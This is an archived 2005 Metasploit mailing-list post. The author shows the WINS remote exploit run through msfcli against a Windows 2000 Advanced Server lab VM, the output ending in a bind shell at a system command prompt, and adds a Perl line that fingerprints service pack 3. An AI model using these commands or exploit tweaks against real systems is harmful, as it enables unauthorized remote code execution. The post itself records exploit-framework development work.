Metasploit mailing list archives
WINS Fingerprint update
From: grutz at jingojango.net (grutz at jingojango.net)
Date: Wed, 12 Jan 2005 17:21:30 -0800
On Wed, Jan 12, 2005 at 02:47:31PM -0800, grutz at jingojango.net brazenly wrote:
I didn't have SP4 handy to put on the vm image.
Just put SP4 on Win2KAS and results are the same:
$ ./msfcli wins RHOST=192.168.191.10 PAYLOAD=win32_bind TARGET=0 E
[*] Starting Bind Handler.
[*] Pointers: [0x05371e90] 0x053dffa4 0x77f98191 0x77f89640
[*] Attempting to overwrite 0x053df4c4 with 0x053922e0 (0x05391f40)
[*] Got connection from 192.168.191.1:3773 <-> 192.168.191.10:4444
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
So for Win2KASsp3, added this line:
$sp = '3' if $ptrs[3] == 0x77f81648; # add for Win2K Advanced Server, SP3
--
..:[ grutz at jingojango dot net ]:..
GPG fingerprint: 5FD6 A27D 63DB 3319 140F B3FB EC95 2A03 8CB3 ECB4
"There's just no amusing way to say, 'I have a CISSP'."
Current thread:
- WINS Fingerprint update grutz at jingojango.net (Jan 12)
- WINS Fingerprint update grutz at jingojango.net (Jan 12)
- WINS Fingerprint update H D Moore (Jan 12)
- WINS Fingerprint update grutz at jingojango.net (Jan 12)